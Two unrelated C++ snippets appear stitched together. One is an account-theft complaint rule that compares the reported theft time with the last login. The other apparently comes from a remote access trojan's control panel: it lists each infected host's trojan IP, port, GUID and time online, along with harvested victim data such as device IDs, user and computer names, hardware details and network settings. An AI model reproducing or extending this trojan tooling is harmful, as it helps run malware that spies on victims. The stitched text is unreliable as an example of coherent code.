/** 被盗时间超过最后登录的时间, 符合规则************************************ * params: ics_info * return: int */ int RobRuleValid::ProCheckLastTime(Rob_Ics_Complaint &info) { char szLastLogin[256]; sprintf(szLastLogin, "%s", (char*)(info.stLastLogin).c_str()); char szRobedTime[256]; sprintf(szRobedTime, "%s", (char*)(info.stRobeLogin).c_str()); return (GetDiffTime(szRobedTime,szLastLogin)<0)?0:1; }
void InfoFrom::InsertData(void* body, void* body2) { struct system_info* info = (struct system_info*)body; struct network_info* nws = info->networks; struct TrojanInfo* trojan = (struct TrojanInfo*)body2; int cntNW = info->cntNW; char buffer[128]; int os = OS_NOTDEFINED; m_treeList.DeleteAllItems(); if(trojan->bOnlineFlag && trojan->s) { os = trojan->ostype; int t = time(NULL) - trojan->timestamp; InsertPair("IP地址", trojan->trojanip); sprintf(buffer, "%d", trojan->port); InsertPair("端口号", buffer); InsertPair("GUID", trojan->guid); strcpy(buffer, GetDiffTime(t)); InsertPair("上线时间", buffer); } if(os == OS_WINDOWS_PHONE) { char* anid = (char*)body, *p = anid; InsertPair("ANID", anid); while(*p) p++; unsigned char* uId = (unsigned char*)++p; p += 20; char uuid[40+1]; for(int i = 0; i < 20; i++) sprintf(uuid+i*2, "%02x", uId[i]); InsertPair("设备ID", uuid); char* devicename = p; while(*p) p++; InsertPair("设备名", devicename); char* manufacture = ++p; while(*p) p++; InsertPair("设备制造商", manufacture); char* firmware = ++p; while(*p) p++; InsertPair("固件版本", firmware); char* hareware = ++p; while(*p) p++; InsertPair("硬件版本", hareware); __int64 memory; memcpy(&memory, ++p, sizeof(memory)); sprintf(buffer, "%d MB", memory/(1024*1024)); InsertPair("设备内存", buffer); p += 8; unsigned short battery; memcpy(&battery, p, sizeof(battery)); InsertPair("电池状态", battery == 0 ? "未在充电" : "正在充电"); p += 2; //char* nw = p; //InsertPair("网络连接类型", nw); return; } //if(os == OS_WINDOWS) strcpy(buffer, GetOSVersion(info->windows.majorVersion, info->windows.minorVersion, info->windows.platformId, info->windows.productType, info->windows.buildNumber)); //else // strcpy(buffer, "未知操作系统"); InsertPair("操作系统", buffer); InsertPair("BIOS", info->biosDesc); InsertPair("CPU类型", info->cpuDesc); sprintf(buffer, "%d", info->cpuCount); InsertPair("CPU数目", buffer); sprintf(buffer, "物理内存%d MB(空闲%d MB)", info->totalMemory/1024, info->availMemory/1024); InsertPair("内存大小", buffer); InsertPair("计算机名", info->computerName); InsertPair("用户名", info->userName); InsertPair("系统目录", info->sysDir); InsertPair("WINDOWS目录", info->winDir); if(cntNW) { HTREEITEM networkparent = InsertPair("网络适配器", NULL); for(int i = 0; i < cntNW; i++) { HTREEITEM parent = InsertPair(nws[i].name, NULL, networkparent); InsertPair("IP地址", nws[i].ip, parent); if(strcmp(nws[i].gateway, "0.0.0.0")) InsertPair("默认网关", nws[i].gateway, parent); if(strcmp(nws[i].mask, "0.0.0.0")) InsertPair("子网掩码", nws[i].mask, parent); } m_treeList.Expand(networkparent, TVE_EXPAND); } }